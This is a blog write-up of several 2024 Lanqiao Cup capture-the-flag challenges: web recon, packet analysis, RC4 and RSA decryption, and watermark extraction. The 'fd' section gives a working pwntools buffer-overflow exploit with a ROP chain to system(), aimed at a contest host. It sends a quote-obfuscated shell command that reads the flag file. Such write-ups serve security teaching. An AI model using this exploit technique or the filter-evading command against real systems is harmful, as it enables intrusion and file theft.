そらをとぶ天翔's Home Page

2024 15th Lanqiao Cup Cybersecurity Track: Write-Up for Selected Challenges

CHTXRT宝 · 2024-04-29 17:49 · 486 views


Crawler Protocol#

Following the hint, request /robots.txt, which reveals the sensitive path /38063b612387b10e22f4bd0d71a46a4e/. Requesting /9de33df789dc91e984a091e6dce2dfb1 under that path returns the flag.

flag{494547b4-f13f-47de-b1a5-a99f20495cd7}

packet#


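Use the filter tcp contains "flag" to find the packets related to the flag, then follow the HTTP stream to get the response data ZmxhZ3s3ZDZmMTdhNC0yYjBhLTQ2N2QtOGE0Mi02Njc1MDM2OGMyNDl9Cg==. Base64-decoding it gives the flag: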

flag{7d6f17a4-2b0a-467d-8a42-66750368c249}

cc#

Opening the web page gives the ciphertext, key, and IV, which can be decrypted directly with a tool.

rc4#

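The hint indicates RC4 encryption. Analyzing the program suggests that Str is the key and v5 is the ciphertext. After converting v5 to unsigned char, decrypting it with a script yields the flag.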

Script:

    import base64


    def rc4_main(key="init_key", message="init_message"):
        print("RC4解密主函数调用成功")
        print('\n')
        s_box = rc4_init_sbox(key)
        crypt = rc4_excrypt(message, s_box)
        return crypt


    def rc4_init_sbox(key):
        # Key-scheduling algorithm (KSA): permute the S-box using the key
        s_box = list(range(256))
        print("原来的 s 盒:%s" % s_box)
        print('\n')
        j = 0
        for i in range(256):
            j = (j + s_box[i] + ord(key[i % len(key)])) % 256
            s_box[i], s_box[j] = s_box[j], s_box[i]
        print("混乱后的 s 盒:%s" % s_box)
        print('\n')
        return s_box


    def rc4_excrypt(plain, box):
        print("调用解密程序成功。")
        print('\n')
        # The input arrives base64-encoded; decode it back to the original characters
        plain = base64.b64decode(plain.encode('utf-8'))
        plain = bytes.decode(plain)
        res = []
        i = j = 0
        # Pseudo-random generation algorithm (PRGA): XOR each character with the keystream
        for s in plain:
            i = (i + 1) % 256
            j = (j + box[i]) % 256
            box[i], box[j] = box[j], box[i]
            t = (box[i] + box[j]) % 256
            k = box[t]
            res.append(chr(ord(s) ^ k))
        print("res用于解密字符串,解密后是:%s" % res)
        print('\n')
        cipher = "".join(res)
        print("解密后的字符串是:%s" % cipher)
        print('\n')
        print("解密后的输出(没经过任何编码):")
        print('\n')
        return cipher


    a = [182, 66, 183, 252, 240, 162, 94, 169, 61, 41, 54, 31, 84, 41, 114, 168,
         99, 50, 242, 68, 139, 133, 236, 13, 173, 63, 147, 163, 146, 116, 129, 101,
         105, 236, 228, 57, 133, 169, 202, 175, 178, 198]  # cipher
    key = "gamelab@"
    s = ""
    for i in a:
        s += chr(i)
    # rc4_excrypt expects base64 text, so wrap the ciphertext accordingly
    s = str(base64.b64encode(s.encode('utf-8')), 'utf-8')
    rc4_main(key, s)

This yields the flag:

解密后的字符串是:flag{12601b2b-2f1e-468a-ae43-92391ff76ef3}

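Missing Data#

Use secret.txt from the archive as a dictionary to crack the encrypted a.png in the archive, then run the script supplied with the challenge after minor modifications: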

    import numpy as np
    import cv2
    import pywt


    class WaterMarkDWT:
        def __init__(self, origin: str, watermark: str, key: int, weight: list):
            self.key = key                    # number of Arnold iterations
            self.img = cv2.imread(origin)     # original image
            self.mark = cv2.imread(watermark) # watermarked image
            self.coef = weight                # weights for the four DWT sub-bands

        def arnold(self, img):
            # Arnold scrambling, applied self.key times
            r, c = img.shape
            p = np.zeros((r, c), np.uint8)
            a, b = 1, 1
            for k in range(self.key):
                for i in range(r):
                    for j in range(c):
                        x = (i + b * j) % r
                        y = (a * i + (a * b + 1) * j) % c
                        p[x, y] = img[i, j]
            return p

        def deArnold(self, img):
            # Inverse Arnold transform
            r, c = img.shape
            p = np.zeros((r, c), np.uint8)
            a, b = 1, 1
            for k in range(self.key):
                for i in range(r):
                    for j in range(c):
                        x = ((a * b + 1) * i - b * j) % r
                        y = (-a * i + j) % c
                        p[x, y] = img[i, j]
            return p

        def get(self, size: tuple = (1200, 1200), flag: int = None):
            img = cv2.resize(self.img, size)
            img1 = cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)
            img2 = cv2.cvtColor(self.mark, cv2.COLOR_RGB2GRAY)
            # Three-level DWT of both images
            c = pywt.wavedec2(img2, 'db2', level=3)
            [cl, (cH3, cV3, cD3), (cH2, cV2, cD2), (cH1, cV1, cD1)] = c
            d = pywt.wavedec2(img1, 'db2', level=3)
            [dl, (dH3, dV3, dD3), (dH2, dV2, dD2), (dH1, dV1, dD1)] = d
            # The weighted difference of the level-3 coefficients is the watermark
            a1, a2, a3, a4 = self.coef
            ca1 = (cl - dl) * a1
            ch1 = (cH3 - dH3) * a2
            cv1 = (cV3 - dV3) * a3
            cd1 = (cD3 - dD3) * a4
            waterImg = pywt.waverec2([ca1, (ch1, cv1, cd1)], 'db2')
            waterImg = np.array(waterImg, np.uint8)
            waterImg = self.deArnold(waterImg)
            # Optional erode/dilate to clean up the extracted watermark
            kernel = np.ones((3, 3), np.uint8)
            if flag == 0:
                waterImg = cv2.erode(waterImg, kernel)
            elif flag == 1:
                waterImg = cv2.dilate(waterImg, kernel)
            cv2.imwrite('水印.png', waterImg)
            return waterImg


    if __name__ == '__main__':
        img = 'a.png'
        waterImg = 'newImg.png'
        k = 20
        xs = [0.2, 0.2, 0.5, 0.4]
        W1 = WaterMarkDWT(img, waterImg, k, xs)
        W1.get()

This produces 水印.png; open it to see the flag.

fd#

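A simple stack overflow, but per the challenge hint, the output of cat has to be redirected to file descriptor 2. The solve script is as follows: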

    #!/usr/bin/python3
    # -*- encoding: utf-8 -*-
    from pwn import *

    p = remote("47.93.142.153", 25722)
    elf = ELF("/mnt/c/Users/崔志鹏/Desktop/临时/pwn")
    start_address = 0x400862
    ret_address = 0x04005ae
    pop_rdi = 0x0400933

    # 64-bit
    context(arch="amd64", os="linux")
    # Padding up to the saved return address
    stack_len = 0x20 + 0x8
    # ret, then pop rdi with 0x00601090 as the argument, then system@plt
    payload = b'\x00'*stack_len + p64(ret_address) + p64(pop_rdi) + p64(0x00601090) + p64(elf.plt['system'])
    # Command string: cat the flag file and send its output to fd 2
    p.sendline(b"ca''t f*>&2")
    p.sendline(payload)
    p.interactive()
    #can can need


Theorem#


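In the challenge script, p and q are adjacent primes, so the gap between them is small. Fermat factorization in a tool recovers p and q, after which the private key and the plaintext follow.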
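The factoring step described above, as an added example that is not part of the original write-up or the challenge script: Fermat's method recovers p and q from n when they are adjacent primes, then rebuilds d and decrypts. The modulus, e = 65537 and the plaintext are constructed sample values, and the function names are illustrative.

```python
from math import isqrt

def is_probable_prime(n, bases=(2, 3, 5, 7, 11, 13, 17)):
    """Miller-Rabin test; used here only to build the constructed demo key."""
    if n < 18 or n % 2 == 0:
        return n in bases
    d, r = n - 1, 0
    while d % 2 == 0:
        d, r = d // 2, r + 1
    for a in bases:
        x = pow(a, d, n)
        if x in (1, n - 1):
            continue
        for _ in range(r - 1):
            x = x * x % n
            if x == n - 1:
                break
        else:
            return False
    return True

def next_prime(x):
    x += 1
    while not is_probable_prime(x):
        x += 1
    return x

def fermat_factor(n, max_steps=1_000_000):
    """Find a with a*a - n = b*b, so n = (a - b)(a + b); fast only if p and q are close."""
    a = isqrt(n - 1) + 1  # ceil(sqrt(n))
    for _ in range(max_steps):
        b = isqrt(a * a - n)
        if b * b == a * a - n:
            return a - b, a + b
        a += 1
    raise ValueError("factors too far apart for Fermat's method")

def recover_plaintext(n, e, c):
    """Factor n, rebuild d = e^-1 mod phi(n), and decrypt c."""
    p, q = fermat_factor(n)
    d = pow(e, -1, (p - 1) * (q - 1))
    m = pow(c, d, n)
    return m.to_bytes((m.bit_length() + 7) // 8, "big")

# Constructed sample (not the challenge's values): adjacent 257-bit primes
P = next_prime(1 << 256)
Q = next_prime(P)
N, E, MSG = P * Q, 65537, b"flag{constructed-sample}"
C = pow(int.from_bytes(MSG, "big"), E, N)
```

With adjacent primes the first candidate a = ceil(sqrt(n)) already equals (p + q) / 2, so the loop succeeds on its first iteration; key generation that picks p and q independently at random does not have this property.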

posted @ 天翔RT · 562 views · 0 comments